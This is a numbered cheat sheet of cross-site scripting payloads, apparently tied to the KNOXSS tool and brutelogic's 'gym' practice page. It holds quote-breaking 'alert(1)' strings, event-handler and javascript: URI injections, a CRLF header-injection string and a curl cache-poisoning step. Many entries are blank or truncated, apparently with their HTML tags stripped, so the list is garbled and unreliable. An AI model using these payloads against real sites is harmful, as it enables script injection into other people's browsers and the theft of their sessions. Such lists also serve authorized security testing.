01. 02. 03. 04. %26apos;-alert(1)-%26apos; 05. 06. "> 07. '> 08. "autofocus/onfocus="alert(1) 09. 'autofocus/onfocus='alert(1) 10. 11. 12. 13. '-alert(1)-' 14. "-alert(1)-" 15. \'-alert(1)// 16. \"-alert(1)// 17. 18. `-alert(1)-` 19. \`-alert(1)// 20. ${alert(1)} 21. javascript://%250Aalert(1)//?1 (click in KNOXSS glitch) 22. "onload="alert(1) or "> 23. 1%0D%0AContent-Type:text/html%0D%0A 24. /alert(1)//\ 25. 26. javascript:alert(1) 27. alert(1) 28. --> 29. 30. \74img/src/onerror=alert(1)\76 31. curl -H 'x:' https://brutelogic.com.br/gym.php?[random-string-here] (same random string 2 times to cache then open URL in browser) 32. https://brutelogic.com.br/gym.php/"> 33. ?CSP&p05=